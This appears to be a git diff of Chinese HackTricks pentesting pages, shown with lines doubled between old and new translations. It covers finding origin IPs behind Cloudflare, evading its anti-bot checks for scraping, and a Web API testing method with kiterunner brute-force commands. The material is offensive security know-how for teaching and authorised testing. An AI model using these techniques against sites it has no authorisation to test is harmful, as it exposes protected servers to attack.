* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上**关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 揭示 Cloudflare 的常见技术
## Common Techniques to Uncover Cloudflare
* 您可以使用一些服务来获取域的**历史 DNS 记录**。也许网页是在以前使用过的 IP 地址上运行的
* 同样可以通过**检查历史 SSL 证书**来实现,这些证书可能指向原始 IP 地址。
* 还要检查**指向 IP 地址的其他子域的 DNS 记录**,因为可能其他子域指向同一服务器(也许是为了提供 FTP、邮件或任何其他服务)。
* 如果在 Web 应用程序中发现**SSRF**,则可以滥用它以获取服务器的 IP 地址。
* 在浏览器中搜索网页的唯一字符串,例如 shodan也许还有 Google 和类似的搜索引擎)。也许您可以找到包含该内容的 IP 地址。
* 类似地,您可以使用工具搜索网站的 favicon 图标:[https://github.com/karma9874/CloudFlare-IP](https://github.com/karma9874/CloudFlare-IP) [https://github.com/pielco11/fav-up](https://github.com/pielco11/fav-up)
* 这种方法不太频繁地起作用,因为服务器在通过 IP 地址访问时必须发送相同的响应,但您永远不知道。
* 你可以使用一些服务来获取域名的**历史DNS记录**。也许网页运行在之前使用过的IP地址上
* 同样可以通过**检查历史SSL证书**来实现这些证书可能指向原始IP地址。
* 还要检查**指向IP的其他子域的DNS记录**因为其他子域可能指向同一服务器可能提供FTP、邮件或其他服务)。
* 如果你在**网络应用程序中发现SSRF**你可以利用它来获取服务器的IP地址。
* 在浏览器中搜索网页的唯一字符串,例如shodan也许还有google和类似的。也许你可以找到带有该内容的IP地址。
* 以类似的方式除了寻找唯一字符串外你还可以使用工具搜索favicon图标:[https://github.com/karma9874/CloudFlare-IP](https://github.com/karma9874/CloudFlare-IP)或[https://github.com/pielco11/fav-up](https://github.com/pielco11/fav-up)
* 这并不总是有效因为服务器必须在通过IP地址访问时发送相同的响应但你永远不知道。
## 揭示 Cloudflare 的工具
## Tools to uncover Cloudflare
* 在 [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com) 中搜索域。或使用工具 [CloudPeler](https://github.com/zidansec/CloudPeler)(使用该 API
* 在 [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/) 中搜索域
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) 是一个工具,将使用包含域名的 Censys 证书进行搜索,然后在这些证书中搜索 IPv4并最终尝试在这些 IP 地址上访问网页。
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r)CloakQuest3r 是一个强大的 Python 工具,精心设计用于揭示由 Cloudflare 和其他替代方案保护的网站的真实 IP 地址,这是一个广泛采用的 Web 安全和性能增强服务。其核心任务是准确识别隐藏在 Cloudflare 保护屏障后面的 Web 服务器的实际 IP 地址。
* 在[http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html)或[https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com)中搜索域。或使用工具[CloudPeler](https://github.com/zidansec/CloudPeler)使用该API
* 在[https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)中搜索域名。
* [**CloudFlair**](https://github.com/christophetd/CloudFlair)是一个工具,将使用包含域名的Censys证书进行搜索然后在这些证书中搜索IPv4最后尝试访问这些IP中的网页。
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r)CloakQuest3r是一个强大的Python工具精心制作以揭示受Cloudflare和其他替代方案保护的网站的真实IP地址这是一个广泛采用的网络安全和性能增强服务。其核心任务是准确识别隐藏在Cloudflare保护屏障后面的Web服务器的实际IP地址。
* [Censys](https://search.censys.io/)
* [Shodan](https://shodan.io/)
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
* 如果您有一组可能包含网页的 IP 地址,您可以使用 [https://github.com/hakluke/hakoriginfinder](https://github.com/hakluke/hakoriginfinder)。
* 如果你有一组潜在的IP地址网页可能位于这些地址上你可以使用[https://github.com/hakluke/hakoriginfinder](https://github.com/hakluke/hakoriginfinder)。
```bash
# You can check if the tool is working with
prips 1.0.0.0/30 | hakoriginfinder -h one.one.one.one
@ -47,9 +48,9 @@ echo "Checking $ir"
prips $ir | hakoriginfinder -h "$DOMAIN"
done
```
## 从云基础设施中揭示 Cloudflare
## 从云基础设施中揭示Cloudflare
请注意,即使这是针对 AWS 机器执行的,也可以针对任何其他云提供商执行。
请注意,即使这是针对AWS机器完成的也可以针对任何其他云提供商进行。
有关此过程的更好描述,请查看:
@ -69,32 +70,32 @@ httpx -json -no-color -list aws_webs.json -header Host: cloudflare.malwareworld.
```
## 通过 Cloudflare 绕过 Cloudflare
### 验证的源拉取
### 认证源拉取
这种机制依赖于**客户端 SSL 证书**来验证**Cloudflare 的反向代理**服务器和**源**服务器之间的连接,这被称为**mTLS**
该机制依赖于 **客户端** [**SSL 证书**](https://socradar.io/how-to-monitor-your-ssl-certificates-expiration-easily-and-why/) **来验证连接**,连接 **Cloudflare 的反向代理** 服务器和 **源** 服务器,这被称为 **mTLS**
客户可以简单地使用 Cloudflare 的证书,而不是配置自己的证书,允许任何来自 Cloudflare 的连接,**无论租户如何**。
客户可以简单地使用 Cloudflare 的证书来允许来自 Cloudflare 的任何连接,**无论租户如何**。
{% hint style="danger" %}
因此,攻击者可以简单地在 Cloudflare 中设置一个**域名,使用 Cloudflare 的证书并将其指向**受害者**域名的 IP 地址。这样设置他的域名完全不受保护Cloudflare 不会保护发送的请求。
因此,攻击者可以仅仅设置一个 **在 Cloudflare 中使用 Cloudflare 的证书的域名,并将其指向** **受害者** 域名的 **IP** 地址。这样设置他的域名完全不受保护Cloudflare 不会保护发送的请求。
{% endhint %}
更多信息[**在这里**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/)。
更多信息 [**在这里**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/)。
### 允许 Cloudflare IP 地址列表
### 允许列表 Cloudflare IP 地址
这将**拒绝不是来自 Cloudflare** IP 地址范围的连接。这也容易受到先前设置的攻击者只需**在 Cloudflare 中指向自己的域名**到**受害者的 IP**地址并对其进行攻击。
这将 **拒绝不来自 Cloudflare 的** IP 地址范围的连接。这也容易受到之前设置的攻击,攻击者只需 **将自己的域名指向 Cloudflare****受害者 IP** 地址并进行攻击。
更多信息[**在这里**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/)。
更多信息 [**在这里**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/)。
## 绕过 Cloudflare 进行抓取
### 缓存
有时您只想绕过 Cloudflare 来抓取网页。有一些选项:
有时你只想绕过 Cloudflare 以抓取网页。对此有一些选项:
* 使用 Google 缓存`https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* 使用其他缓存服务,如[https://archive.org/web/](https://archive.org/web/)
* 使用 Google 缓存: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* 使用其他缓存服务,如 [https://archive.org/web/](https://archive.org/web/)
### 工具
@ -104,61 +105,62 @@ httpx -json -no-color -list aws_webs.json -header Host: cloudflare.malwareworld.
### Cloudflare 解决方案
已开发了多 Cloudflare 解决方案:
开发了多 Cloudflare 解决方案:
* [FlareSolverr](https://github.com/FlareSolverr/FlareSolverr)
* [cloudscraper](https://github.com/VeNoMouS/cloudscraper) [这里有指南](https://scrapeops.io/python-web-scraping-playbook/python-cloudscraper/)
* [cloudscraper](https://github.com/VeNoMouS/cloudscraper) [指南在这里](https://scrapeops.io/python-web-scraping-playbook/python-cloudscraper/)
* [cloudflare-scrape](https://github.com/Anorov/cloudflare-scrape)
* [CloudflareSolverRe](https://github.com/RyuzakiH/CloudflareSolverRe)
* [Cloudflare-IUAM-Solver](https://github.com/ninja-beans/cloudflare-iuam-solver)
* [cloudflare-bypass](https://github.com/devgianlu/cloudflare-bypass) \[已存档\]
* [cloudflare-bypass](https://github.com/devgianlu/cloudflare-bypass) \[已归档]
* [CloudflareSolverRe](https://github.com/RyuzakiH/CloudflareSolverRe)
### 加固的无头浏览器 <a href="#option-4-scrape-with-fortified-headless-browsers" id="option-4-scrape-with-fortified-headless-browsers"></a>
使用一个不被识别为自动化浏览器的无头浏览器(您可能需要为此进行定制)。一些选项包括:
使用一个不会被检测为自动化浏览器的无头浏览器(你可能需要为此进行自定义)。一些选项包括:
* **Puppeteer** [puppeteer](https://github.com/puppeteer/puppeteer)的[隐身插件](https://github.com/berstend/puppeteer-extra/tree/master/packages/puppeteer-extra-plugin-stealth)。
* **Playwright** [隐身插件](https://www.npmjs.com/package/playwright-stealth)即将推出 Playwright。请关注[这里](https://github.com/berstend/puppeteer-extra/issues/454)和[这里](https://github.com/berstend/puppeteer-extra/tree/master/packages/playwright-extra)的最新动态
* **Selenium** [undetected-chromedriver](https://github.com/ultrafunkamsterdam/undetected-chromedriver) 一个优化的 Selenium Chromedriver 补丁。
* **Puppeteer:** [stealth 插件](https://github.com/berstend/puppeteer-extra/tree/master/packages/puppeteer-extra-plugin-stealth) 用于 [puppeteer](https://github.com/puppeteer/puppeteer)。
* **Playwright:** [stealth 插件](https://www.npmjs.com/package/playwright-stealth) 很快将加入 Playwright。请在 [这里](https://github.com/berstend/puppeteer-extra/issues/454) [这里](https://github.com/berstend/puppeteer-extra/tree/master/packages/playwright-extra) 关注进展
* **Selenium:** [undetected-chromedriver](https://github.com/ultrafunkamsterdam/undetected-chromedriver) 一个优化的 Selenium Chromedriver 补丁。
### 带有内置 Cloudflare 绕过功能的智能代理 <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
### 内置绕过的智能代理 <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
**智能代理**由专业公司持续更新,旨在规避 Cloudflare 的安全措施(因为这是他们的业务)。
**智能代理** 由专业公司持续更新,旨在超越 Cloudflare 的安全措施(因为这是他们的业务)。
其中一些是:
* [ScraperAPI](https://www.scraperapi.com/?fp_ref=scrapeops)
* [ScraperAPI](https://www.scraperapi.com/?fp\_ref=scrapeops)
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
* [Oxylabs](https://oxylabs.go2cloud.org/aff_c?offer_id=7\&aff_id=379\&url_id=32)
* [Oxylabs](https://oxylabs.go2cloud.org/aff\_c?offer\_id=7\&aff\_id=379\&url\_id=32)
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/\[p\_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) 以其专有的 Cloudflare 绕过机制而闻名。
对于寻求优化解决方案的人,[ScrapeOps 代理聚合器](https://scrapeops.io/proxy-aggregator/)脱颖而出。该服务将超过 20 个代理提供商集成到单个 API 中,自动选择最佳和最具成本效益的代理,从而为您的目标域提供了一个更优越的选项,以应对 Cloudflare 的防御措施
对于寻求优化解决方案的人,[ScrapeOps 代理聚合器](https://scrapeops.io/proxy-aggregator/) 脱颖而出。该服务将超过 20 个代理提供商集成到一个 API 中,自动选择最佳和最具成本效益的代理,以便为你的目标域名提供更优的选择,从而更好地应对 Cloudflare 的防御
### 向工程 Cloudflare 反机器人保护 <a href="#option-6-reverse-engineer-cloudflare-anti-bot-protection" id="option-6-reverse-engineer-cloudflare-anti-bot-protection"></a>
### 向工程 Cloudflare 反机器人保护 <a href="#option-6-reverse-engineer-cloudflare-anti-bot-protection" id="option-6-reverse-engineer-cloudflare-anti-bot-protection"></a>
反向工程 Cloudflare 的反机器人措施是智能代理提供商使用的一种策略,适用于大规模网页抓取,而无需运行许多无头浏览器的高成本
逆向工程 Cloudflare 的反机器人措施是智能代理提供商使用的一种策略,适合于大规模网页抓取,而无需高成本地运行多个无头浏览器
**优势:** 该方法允许创建一个极其高效的绕过方式,专门针对 Cloudflare 的检查,非常适合大规模操作。
**优点:** 这种方法允许创建一个极其高效的绕过,专门针对 Cloudflare 的检查,适合大规模操作。
**劣势:** 缺点在于理解和欺骗 Cloudflare 故意模糊的反机器人系统所涉及的复杂性,需要不断努力测试不同策略并更新绕过方式,因为 Cloudflare 不断加强其保护措施
**缺点:** 缺点在于理解和欺骗 Cloudflare 故意模糊的反机器人系统的复杂性,需要持续努力测试不同的策略并在 Cloudflare 增强其保护时更新绕过
在[原始文章](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)中找到更多关于如何执行此操作的信息
有关如何做到这一点的更多信息,请参见 [原始文章](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)。
## 参考资料
## 参考文献
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

88
network-services-pentesting/pentesting-web/web-api-pentesting.md
View file

@ -1,70 +1,71 @@
# Web API 渗透测试
# Web API Pentesting
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) 的 github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) 可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
## API 渗透测试方法论总结
## API 渗透测试方法概述
渗透测试 API 涉及一种结构化方法来发现漏洞。本指南概括了一套全面的方法论,强调实用技术和工具。
渗透测试 API 涉及一种结构化的方法来发现漏洞。本指南概括了一种全面的方法论,强调实用的技术和工具。
### **理解 API 类型**
* **SOAP/XML Web 服务**:使用 WSDL 格式的文档,通常在 `?wsdl` 路径下找到。像 **SOAPUI****WSDLer**Burp Suite 扩展)这样的工具对解析和生成请求非常有帮助。示例文档可在 [DNE Online](http://www.dneonline.com/calculator.asmx) 上访问
* **REST APIJSON**:文档通常以 WADL 文件形式提供,但像 [Swagger UI](https://swagger.io/tools/swagger-ui/) 这样的工具提供了一个更用户友好的界面进行交互。**Postman** 是一个用于创建和管理示例请求的宝贵工具。
* **GraphQL**:一种用于 API 的查询语言,提供对 API 中数据的完整和可理解的描述。
* **SOAP/XML Web 服务**:使用 WSDL 格式进行文档记录,通常位于 `?wsdl` 路径。像 **SOAPUI****WSDLer**Burp Suite 扩展)这样的工具对于解析和生成请求至关重要。示例文档可在 [DNE Online](http://www.dneonline.com/calculator.asmx) 获取
* **REST APIs (JSON)**:文档通常以 WADL 文件形式提供,但像 [Swagger UI](https://swagger.io/tools/swagger-ui/) 这样的工具提供了更友好的交互界面。**Postman** 是创建和管理示例请求的有价值工具。
* **GraphQL**:一种用于 API 的查询语言,提供对 API 中数据的完整和可理解的描述。
### **实践实验室**
* [**VAmPI**](https://github.com/erev0s/VAmPI):一个故意设计成易受攻击的 API用于实践涵盖 OWASP 十大 API 漏洞。
* [**VAmPI**](https://github.com/erev0s/VAmPI):一个故意存在漏洞的 API供实践使用涵盖 OWASP 前 10 大 API 漏洞。
### **API 渗透测试的有效技巧**
* **SOAP/XML 漏洞**:探索 XXE 漏洞,尽管 DTD 声明通常受限。如果 XML 保持有效CDATA 标记可能允许插入有效载荷
* **权限提升**:测试具有不同权限级别的端点,以识别未授权访问的可能性。
* **CORS 配置错误**调查 CORS 设置,以便通过已认证会话的 CSRF 攻击进行潜在利用
* **端点发现**:利用 API 模式发现隐藏的端点。工具如模糊器可以自动化此过程。
* **参数篡改**:尝试在请求中添加或替换参数,以访问未授权的数据或功能。
* **HTTP 方法测试**变化请求方法GET、POST、PUT、DELETE、PATCH以发现意外行为或信息泄霏
* **内容类型操纵**:在不同的内容类型之间切换x-www-form-urlencoded、application/xml、application/json以测试解析问题或漏洞。
* **高级参数技术**:在 JSON 负载中测试意外数据类型,或者尝试使用 XML 数据进行 XXE 注入。还可以尝试参数污染和通配符字符进行更广泛的测试。
* **版本测试**:旧的 API 版本可能更容易受到攻击。始终检查并针对多个 API 版本进行测试
* **SOAP/XML 漏洞**:探索 XXE 漏洞,尽管 DTD 声明通常受到限制。如果 XML 保持有效CDATA 标签可能允许有效负载插入
* **权限提升**:测试具有不同权限级别的端点,以识别未授权访问的可能性。
* **CORS 配置错误**检查 CORS 设置,以寻找通过已认证会话的 CSRF 攻击的潜在利用点
* **端点发现**:利用 API 模式发现隐藏的端点。像模糊测试工具可以自动化此过程。
* **参数篡改**:尝试在请求中添加或替换参数,以访问未授权的数据或功能。
* **HTTP 方法测试**更改请求方法GET、POST、PUT、DELETE、PATCH以发现意外行为或信息泄露
* **内容类型操控**:在不同内容类型x-www-form-urlencoded、application/xml、application/json之间切换,以测试解析问题或漏洞。
* **高级参数技术**:在 JSON 有效负载中测试意外数据类型,或玩弄 XML 数据以进行 XXE 注入。同时,尝试参数污染和通配符字符以进行更广泛的测试。
* **版本测试**旧的 API 版本可能更容易受到攻击。始终检查并测试多个 API 版本
### **API 渗透测试的工具和资源**
* [**kiterunner**](https://github.com/assetnote/kiterunner)用于发现 API 端点的绝佳工具。使用它来扫描和针对目标 API 对路径和参数进行暴力破解
* [**kiterunner**](https://github.com/assetnote/kiterunner)非常适合发现 API 端点。使用它扫描和暴力破解路径和参数,以针对目标 API
```bash
kr scan https://domain.com/api/ -w routes-large.kite -x 20
kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
kr brute https://domain.com/api/ -A=raft-large-words -x 20 -d=0
kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
```
* 类似 **automatic-api-attack-tool**、**Astra** 和 **restler-fuzzer** 这样的附加工具提供针对 API 安全测试的定制功能,从攻击模拟到模糊测试和漏洞扫描不等
* [**Cherrybomb**](https://github.com/blst-security/cherrybomb):这是一个 API 安全工具,根据 OAS 文件对您的 API 进行审计(该工具使用 Rust 编写)。
* 其他工具如 **automatic-api-attack-tool**、**Astra** 和 **restler-fuzzer** 提供针对 API 安全测试的定制功能,从攻击模拟到模糊测试和漏洞扫描。
* [**Cherrybomb**](https://github.com/blst-security/cherrybomb):这是一个基于 OAS 文件审计您的 API 的 API 安全工具(该工具用 Rust 编写)。
### **学习和实践资源**
* **OWASP API 安全前 10 名**:了解常见 API 漏洞的必读内容([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf)
* **API 安全检查清单**用于保护 API 的全面检查清单([GitHub 链接](https://github.com/shieldfy/API-Security-Checklist)
* **Logger++ 过滤器**对于查找 API 漏洞Logger++ 提供了有用的过滤器([GitHub 链接](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters)
* **API 端点列表**用于测试目的的潜在 API 端点的策划列表([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d)
* **OWASP API 安全前 10**:了解常见 API 漏洞的必读材料 ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf))
* **API 安全检查清单**一个全面的 API 安全检查清单 ([GitHub link](https://github.com/shieldfy/API-Security-Checklist))
* **Logger++ 过滤器**用于寻找 API 漏洞Logger++ 提供有用的过滤器 ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters))
* **API 端点列表**一个为测试目的整理的潜在 API 端点列表 ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d))
## 参考资料
@ -72,21 +73,22 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) 可以轻松构建和 **自动化工作流程**,使用全球 **最先进** 的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

88
network-services-pentesting/pentesting-web/werkzeug.md
View file

@ -1,74 +1,75 @@
# Werkzeug / Flask Debug
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live) 上 **关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
